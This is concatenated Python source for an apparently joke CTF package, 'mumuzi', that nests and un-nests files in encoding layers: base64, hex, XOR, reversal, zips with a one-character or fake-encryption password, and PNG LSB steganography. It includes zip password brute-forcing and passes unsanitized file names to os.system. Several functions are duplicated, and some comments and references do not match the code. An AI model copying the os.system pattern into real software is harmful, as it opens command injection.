    packages=setuptools.find_packages(where="mumuzi"),
    python_requires=">=3.6",
    install_requires=[
    'pyreadline',
    'colorama',
    'pillow',
    'pwntools'],
    package_data = {
# 包含所有.txt文件
'':['modules/misc/.py'],
'':['modules/web/.py'],
}
)


import binascii
import random
import os
from . import LSB
import time
import base64
from PIL import Image
import zipfile


def enc_to_txt_file(input_file,output_file,method):
	print("enc_to_txt_file",input_file,output_file,method)
	#output_file_type=txt,1 base64 2 base85 3 文件hex 	
	with open(input_file,'rb')as f:
		input_data=f.read()
	with open(output_file,'w')as f:
		if method==1:
			#1 base64
			f.write("This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"+base64.b64encode(input_data).decode())
		elif method==2:
			#3 base85
			f.write("This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"+base64.a85encode(input_data).decode())
		elif method==3:
			# 文件hex
			f.write("This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"+binascii.b2a_hex(input_data).decode())


def enc_to_zip_file(input_file,output_file,method):
	print('enc_to_zip_file',input_file,output_file,method)
	#output_file_type=zip,1 随机加密密码为可见3位随机字符 2 伪加密
	layer="This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"
	if method==1:
		password=random.choice('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ')
		cmd='zip -P '+password+' '+output_file+' '+input_file
		#print(cmd)
		os.system(cmd)
		with open(output_file,'rb')as f:
			old = f.read()
		with open(output_file,'wb')as f:
			f.write(layer.encode()+old)
	elif method==2:
		cmd='zip '+output_file+' '+input_file
		os.system(cmd)
		with open(output_file, 'rb') as f:
			r_all = f.read()
			r_all = bytearray(r_all)
			#  504B0304后的第3、4个byte改成0900
			index = r_all.find(b'PK\x03\x04')
			if not index:
				i = index + 4
				r_all[i + 2:i + 4] = b'\x09\x00'
			 #  504B0102后的第5、6个byte改成0900
			index1 = r_all.find(b'PK\x01\x02')
			if index1:
				i = index1 + 4
				r_all[i + 4:i + 6] = b'\x09\x00'
		with open(output_file, 'wb') as f1:
			f1.write(layer.encode()+r_all)

def enc_reverse_file(input_file,output_file):
	#全文件倒序
	print('enc_reverse_file',input_file,output_file)
	layer="This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"
	with open(input_file,'rb')as f:
		old = f.read()
	with open(output_file,'wb')as f:
		f.write(layer.encode()+old[::-1])

def enc_xor_file(input_file,output_file):
	#全文件xor
	print("enc_xor_file",input_file,output_file)
	layer="This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"
	key=ord(random.choice('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'))
	with open(input_file,'rb')as f:
		bindata=f.read()
	with open(output_file,'wb')as f:
		f.write(layer.encode())
		for i in bindata:
			f.write(int(i ^ key).to_bytes(1, 'big'))



def enc_to_png_file(input_file,output_file,method):
	png_base_file=b"""iVBORw0KGgoAAAANSUhEUgAAAgAAAAIACAYAAAD0eNT6AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAEnQAABJ0Ad5mH3gAAAhcSURBVHhe7dYxAQAgDMCwgX/PwIGLJk8tdJ1nAICU/QsAhBgAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAADkzF445B/wqOZhLAAAAAElFTkSuQmCC"""
	png_base_file_b=base64.b64decode(png_base_file)
	png_base_file_small=b"""iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAEnQAABJ0Ad5mH3gAAAANSURBVBhXY/j///9/AAn7A/0FQ0XKAAAAAElFTkSuQmCC"""
	print('enc_to_png_file',input_file,output_file,method)
	layer="This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"
	with open('temp.png','wb')as f:
		f.write(png_base_file_b)
	if method==1:
		with open(input_file,'rb')as f:
			old=f.read()
		with open(output_file,'wb')as f:
			f.write(layer.encode()+base64.b64decode(png_base_file_small)+old)
	elif method==2:
		with open(input_file,'rb')as f:
			input_file_data=f.read()
		LSB.LSB(path='',ori='temp.png',out=output_file+'.png',payload=input_file_data,bit=random.choice(["43670251","40325716","17206543","05621437","40357162","05312476","32746150","46572301","04351762"]),plane='RGBA')
		with open(output_file+'.png','rb')as f:
			old = f.read()
		with open(output_file,'wb')as f:
			f.write(layer.encode()+old)

def get_file_size(filename):
	with open(filename,'rb')as f:
		return(len(f.read()))


def waiting(cycle=20, delay=0.01):
	"""旋转式进度指示"""
	for i in range(cycle):
		for ch in ['-', '\\', '|', '/']:
			print('\b%s'%ch, end='', flush=True)
			time.sleep(delay)
		print('\b..',end='',flush=True)
	print('')
	print('')


def bytes2hex(bytes):  
	num = len(bytes)  
	hexstr = u""  
	for i in range(num):  
		t = u"%x" % bytes[i]  
		if(len(t) % 2):  
			hexstr += u"0"  
		hexstr += t  
	return hexstr.lower()  #小写

  
# 获取文件类型  
def filetype(file_bins):  
	bins = bytes2hex(file_bins)[:18].lower() #提取18个字符、转码  
	tl = {'89504e470d0a1a0a00':'png',
		'504b03040a00090000':'zip',
		'504b03041400090008':'zip',
		'504b03041400090000':'zip',
		'546869735f69735f6c':'reverse',
		'645859436f59436f5c': 'xor_key_0',
		'655958426e58426e5d': 'xor_key_1',
		'665a5b416d5b416d5e': 'xor_key_2',
		'675b5a406c5a406c5f': 'xor_key_3',
		'605c5d476b5d476b58': 'xor_key_4',
		'615d5c466a5c466a59': 'xor_key_5',
		'625e5f45695f45695a': 'xor_key_6',
		'635f5e44685e44685b': 'xor_key_7',
		'6c50514b67514b6754': 'xor_key_8',
		'6d51504a66504a6655': 'xor_key_9',
		'350908123e08123e0d': 'xor_key_a',
		'360a0b113d0b113d0e': 'xor_key_b',
		'370b0a103c0a103c0f': 'xor_key_c',
		'300c0d173b0d173b08': 'xor_key_d',
		'310d0c163a0c163a09': 'xor_key_e',
		'320e0f15390f15390a': 'xor_key_f',
		'330f0e14380e14380b': 'xor_key_g',
		'3c00011b37011b3704': 'xor_key_h',
		'3d01001a36001a3605': 'xor_key_i',
		'3e0203193503193506': 'xor_key_j',
		'3f0302183402183407': 'xor_key_k',
		'3804051f33051f3300': 'xor_key_l',
		'3905041e32041e3201': 'xor_key_m',
		'3a06071d31071d3102': 'xor_key_n',
		'3b07061c30061c3003': 'xor_key_o',
		'241819032f19032f1c': 'xor_key_p',
		'251918022e18022e1d': 'xor_key_q',
		'261a1b012d1b012d1e': 'xor_key_r',
		'271b1a002c1a002c1f': 'xor_key_s',
		'201c1d072b1d072b18': 'xor_key_t',
		'211d1c062a1c062a19': 'xor_key_u',
		'221e1f05291f05291a': 'xor_key_v',
		'231f1e04281e04281b': 'xor_key_w',
		'2c10110b27110b2714': 'xor_key_x',
		'2d11100a26100a2615': 'xor_key_y',
		'2e1213092513092516': 'xor_key_z',
		'152928321e28321e2d': 'xor_key_A',
		'162a2b311d2b311d2e': 'xor_key_B',
		'172b2a301c2a301c2f': 'xor_key_C',
		'102c2d371b2d371b28': 'xor_key_D',
		'112d2c361a2c361a29': 'xor_key_E',
		'122e2f35192f35192a': 'xor_key_F',
		'132f2e34182e34182b': 'xor_key_G',
		'1c20213b17213b1724': 'xor_key_H',
		'1d21203a16203a1625': 'xor_key_I',
		'1e2223391523391526': 'xor_key_J',
		'1f2322381422381427': 'xor_key_K',
		'1824253f13253f1320': 'xor_key_L',
		'1925243e12243e1221': 'xor_key_M',
		'1a26273d11273d1122': 'xor_key_N',
		'1b27263c10263c1023': 'xor_key_O',
		'043839230f39230f3c': 'xor_key_P',
		'053938220e38220e3d': 'xor_key_Q',
		'063a3b210d3b210d3e': 'xor_key_R',
		'073b3a200c3a200c3f': 'xor_key_S',
		'003c3d270b3d270b38': 'xor_key_T',
		'013d3c260a3c260a39': 'xor_key_U',
		'023e3f25093f25093a': 'xor_key_V',
		'033f3e24083e24083b': 'xor_key_W',
		'0c30312b07312b0734': 'xor_key_X',
		'0d31302a06302a0635': 'xor_key_Y',
		'0e3233290533290536': 'xor_key_Z',
		'353436383639373335': 'hex',
		'564768706331397063': 'base64',
		'3c2b6f75653f594f52': 'base85'
		}  #文件类型  
	ftype = 'unknown'  
	for hcode in tl.keys():  
		if bins == hcode:  
			ftype = tl[hcode]  
			break
	if ftype=='unknown':
		if bytes2hex(file_bins)[-18:].lower()=='6c5f73695f73696854':
			ftype='reverse'

	return ftype  



#把某单个plane的像素的8位二进制值和顺序传入，返回原数据
def rgba2bytes(bitstr,order):
	ori_bit=''
	for k in order:
		ori_bit=ori_bit+bitstr[7-int(k)]

	return int(ori_bit,2).to_bytes(1,byteorder='little')

#传入png文件名和通道顺序，返回原文件bytes
def png_method_2(ori_pic,order,full=0):	
	img_src=Image.open(ori_pic)
	w, h, m = img_src.size[0], img_src.size[1], img_src.mode
	str_strlist = img_src.load()
	output=b''
	if full==1:
		for j in range(h):
			for i in range(w):
				for rgba in range(4):
					s=str(bin(str_strlist[i,j][rgba]))[2:]
					s='0'*(8-len(s))+s
					output=output+rgba2bytes(s,order)
	else:
		for i in range(3):
			for rgba in range(4):
				s=str(bin(str_strlist[i,0][rgba]))[2:]
				s='0'*(8-len(s))+s
				output=output+rgba2bytes(s,order)

	return(output)

#传入mumuzi认为的png文件和当前层数，尝试解码
def check_png_method(input_file,current_layer):
	#check_png_method_1
	png_base_file_small=b"""iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAEnQAABJ0Ad5mH3gAAAANSURBVBhXY/j///9/AAn7A/0FQ0XKAAAAAElFTkSuQmCC"""
	layer="This_is_layer_"+str(current_layer)+"_of_Matryoshka:"
	output_file=input_file.split('.')[0]+'.layer'+str(current_layer-1)
	with open(input_file,'rb')as f:
		file_data_b=f.read()
	head_cnt=len(layer.encode()+base64.b64decode(png_base_file_small))
	if file_data_b[head_cnt:head_cnt+14]==b'This_is_layer_':
		#method1
		with open(output_file,'wb')as f:
			f.write(file_data_b[len(layer.encode()+base64.b64decode(png_base_file_small)):])
			return output_file
	else:
		#method2
		with open('temp.png','wb')as f:
			f.write(file_data_b[len(layer.encode()):])
		orders=["43670251","40325716","17206543","05621437","40357162","05312476","32746150","46572301","04351762"]	
		for order in orders:
			if png_method_2('temp.png',order)==b'This_is_laye':
				with open(output_file,'wb')as f:
					f.write(png_method_2('temp.png',order,full=1).rstrip(b'\xff'))
				return(output_file)

	return('no_png_method_matches')


def decrypt_zip_fake_encryption(filename):
	with open(filename, 'rb') as f:
			r_all = f.read()
			r_all = bytearray(r_all)
			#  504B0304后的第3、4个byte改成0000
			index = r_all.find(b'PK\x03\x04')
			if not index:
				i = index + 4
				r_all[i + 2:i + 4] = b'\x00\x00'
			 #  504B0102后的第5、6个byte改成0000
			index1 = r_all.find(b'PK\x01\x02')
			if index1:
				i = index1 + 4
				r_all[i + 4:i + 6] = b'\x00\x00'
	with open(filename, 'wb') as f1:
		f1.write(r_all)



def check_zip_method(input_file,current_layer):
	#创建临时zip文件
	layer="This_is_layer_"+str(current_layer)+"_of_Matryoshka:"
	output_file=input_file.split('.')[0]+'.layer'+str(current_layer-1)
	with open(input_file,'rb')as f:
		layer_data_b=f.read()[len(layer):]
	with open('temp.zip','wb')as f:
		f.write(layer_data_b)
	z=zipfile.ZipFile('temp.zip')
	for password in '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ':
		z.setpassword(password.encode())
		try:
			data=z.read(z.namelist()[0])
			if len(data)>0:
				with open(output_file,'wb')as f:
					f.write(data)
				return output_file
		except:
			pass
	decrypt_zip_fake_encryption('temp.zip')
	z=zipfile.ZipFile('temp.zip')
	data=z.read(z.namelist()[0])
	if len(data)>0:
		with open(output_file,'wb')as f:
			f.write(data)
		return output_file
	

	return ('no_zip_method_matches')



#解码png和zip文件：
def decode_file(filename,filetype,current_layer):
	layer="This_is_layer_"+str(current_layer)+"_of_Matryoshka:"
	output_file=filename.split('.')[0]+'.layer'+str(current_layer-1)
	if filetype=='png':
		return check_png_method(filename,current_layer)
	elif filetype=='zip':
		return check_zip_method(filename,current_layer)
	elif filetype=='reverse':
		with open(filename,'rb')as f:
			old = f.read()[len(layer):]
		with open(output_file,'wb')as f:
			f.write(old[::-1])
		return output_file


#用密钥解xor：
def decode_xor(filename,key,current_layer):
	layer="This_is_layer_"+str(current_layer)+"_of_Matryoshka:"
	output_file=filename.split('.')[0]+'.layer'+str(current_layer-1)
	with open(filename,'rb')as f:
		bindata=f.read()[len(layer):]
	with open(output_file,'wb')as f:
		for i in bindata:
			f.write(int(i ^ ord(key)).to_bytes(1, 'big'))
	return output_file

#解码txt文件
def decode_txt(filename,txt_type,current_layer):
	layer="This_is_layer_"+str(current_layer)+"_of_Matryoshka:"
	output_file=filename.split('.')[0]+'.layer'+str(current_layer-1)
	with open(filename,'rb')as f:
		input_data=f.read()[len(layer):]
	with open(output_file,'wb')as f:
		if txt_type=='base64':
			#1 base64
			f.write(base64.b64decode(input_data))
		elif txt_type=='base85':
			#3 base85
			f.write(base64.a85decode(input_data))
		elif txt_type=='hex':
			# 文件hex
			f.write(binascii.a2b_hex(input_data))
	return output_file











 # -*- coding: utf-8 -*-
import base64
import re
import random
from .taoshenyulu import taoshenyulu
import hashlib
import time
from .tao_func import *
from .banners import banners
from urllib import request,parse
import json
import importlib


layer_pattern = re.compile(b'^This_is_layer_.*?_of_Matryoshka:')
def enc_to_txt_file(input_file,output_file,method):
	print("enc_to_txt_file",input_file,output_file,method)
	#output_file_type=txt,1 base64 2 base85 3 文件hex 	
	with open(input_file,'rb')as f:
		input_data=f.read()
	with open(output_file,'w')as f:
		if method==1:
			#1 base64
			f.write("This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"+base64.b64encode(input_data).decode())
		elif method==2:
			#3 base85
			f.write("This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"+base64.a85encode(input_data).decode())
		elif method==3:
			# 文件hex
			f.write("This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"+binascii.b2a_hex(input_data).decode())


def enc_to_zip_file(input_file,output_file,method):
	print('enc_to_zip_file',input_file,output_file,method)
	#output_file_type=zip,1 随机加密密码为可见3位随机字符 2 伪加密
	layer="This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"
	if method==1:
		password=random.choice('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ')
		cmd='zip -P '+password+' '+output_file+' '+input_file
		#print(cmd)
		os.system(cmd)
		with open(output_file,'rb')as f:
			old = f.read()
		with open(output_file,'wb')as f:
			f.write(layer.encode()+old)
	elif method==2:
		cmd='zip '+output_file+' '+input_file
		os.system(cmd)
		with open(output_file, 'rb') as f:
			r_all = f.read()
			r_all = bytearray(r_all)
			#  504B0304后的第3、4个byte改成0900
			index = r_all.find(b'PK\x03\x04')
			if not index:
				i = index + 4
				r_all[i + 2:i + 4] = b'\x09\x00'
			 #  504B0102后的第5、6个byte改成0900
			index1 = r_all.find(b'PK\x01\x02')
			if index1:
				i = index1 + 4
				r_all[i + 4:i + 6] = b'\x09\x00'
		with open(output_file, 'wb') as f1:
			f1.write(layer.encode()+r_all)

def enc_reverse_file(input_file,output_file):
	#全文件倒序
	print('enc_reverse_file',input_file,output_file)
	layer="This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"
	with open(input_file,'rb')as f:
		old = f.read()
	with open(output_file,'wb')as f:
		f.write(layer.encode()+old[::-1])

def enc_xor_file(input_file,output_file):
	#全文件xor
	print("enc_xor_file",input_file,output_file)
	layer="This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"
	key=ord(random.choice('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'))
	with open(input_file,'rb')as f:
		bindata=f.read()
	with open(output_file,'wb')as f:
		f.write(layer.encode())
		for i in bindata:
			f.write(int(i ^ key).to_bytes(1, 'big'))



def enc_to_png_file(input_file,output_file,method):
	png_base_file=b"""iVBORw0KGgoAAAANSUhEUgAAAgAAAAIACAYAAAD0eNT6AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAEnQAABJ0Ad5mH3gAAAhcSURBVHhe7dYxAQAgDMCwgX/PwIGLJk8tdJ1nAICU/QsAhBgAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAAEEGAACCDAAABBkAAAgyAAAQZAAAIMgAAECQAQCAIAMAADkzF445B/wqOZhLAAAAAElFTkSuQmCC"""
	png_base_file_b=base64.b64decode(png_base_file)
	png_base_file_small=b"""iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAEnQAABJ0Ad5mH3gAAAANSURBVBhXY/j///9/AAn7A/0FQ0XKAAAAAElFTkSuQmCC"""
	print('enc_to_png_file',input_file,output_file,method)
	layer="This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka:"
	with open('temp.png','wb')as f:
		f.write(png_base_file_b)
	if method==1:
		with open(input_file,'rb')as f:
			old=f.read()
		with open(output_file,'wb')as f:
			f.write(layer.encode()+base64.b64decode(png_base_file_small)+old)
	elif method==2:
		with open(input_file,'rb')as f:
			input_file_data=f.read()
		LSB.LSB(path='',ori='temp.png',out=output_file+'.png',payload=input_file_data,bit=random.choice(["43670251","40325716","17206543","05621437","40357162","05312476","32746150","46572301","04351762"]),plane='RGBA')
		with open(output_file+'.png','rb')as f:
			old = f.read()
		with open(output_file,'wb')as f:
			f.write(layer.encode()+old)
			
class mumuzi:
	'大家最爱的mumuzi'
	tao_layer=0
	talk_count=0
	name="mumuzi"
	description="我是大家最爱的mumuzi，你可以叫我ctf全栈全自动解题姬哟~"
	def __init__(self):
		banner=random.choice(banners)
		print(banner)
		print('='*len(banner.split('\n')[-2])+'=')
		print('Now Initiating..',end='')
		waiting(cycle=8)
		print('succeeded!')
		print('')
		time.sleep(0.1)
		print('Connecting mumuzi..',end='')
		waiting(cycle=6)
		time.sleep(0.1)
		print('mumuzi:\n\t没事叫我干嘛，爬!')

	def help(self):
		help_msg='''mumuzi:
	不帮，滚

一般路过群友:
	mumuzi目前可使用的函数列表如下：

	1.tao(input_filename,layer)
		自动套娃，输入文件名和层数，根据套神的心情好坏来帮你套娃，返回值为输出文件名。
	2.talk()
		和神说话。
	3.kou()
		表演口算md5。
	4.bi()
		表演笔算比特币。
	5.shou()
		表演手撸一个计算。
	6.kua()
		套神夸人。
	7.ban()
		使用系统管理员权限封了套神的号。
	8.solve(input_filename)
		自动解套娃，输入文件名，根据套神的心情好坏来帮你解套娃，返回值为解套文件名。
		
mumuzi:
	不要插嘴，你也给我爬'''
		print(help_msg)

	def talk(self):
		'跟神说话'
		print('='*100)
		print(random.choice(taoshenyulu))
		mumuzi.talk_count=mumuzi.talk_count+1


	def tao(self,input_file,layer):
		'套题'
		for i in range(layer):
			if mumuzi.tao_layer>mumuzi.talk_count:
				print('mumuzi:\n\t麻了\nmumuzi:\n\t还要冲一次\nmumuzi:\n\t腿已经软了')
				return
			print("This_is_layer_"+str(mumuzi.tao_layer)+"_of_Matryoshka")
			mumuzi.tao_layer=mumuzi.tao_layer+1
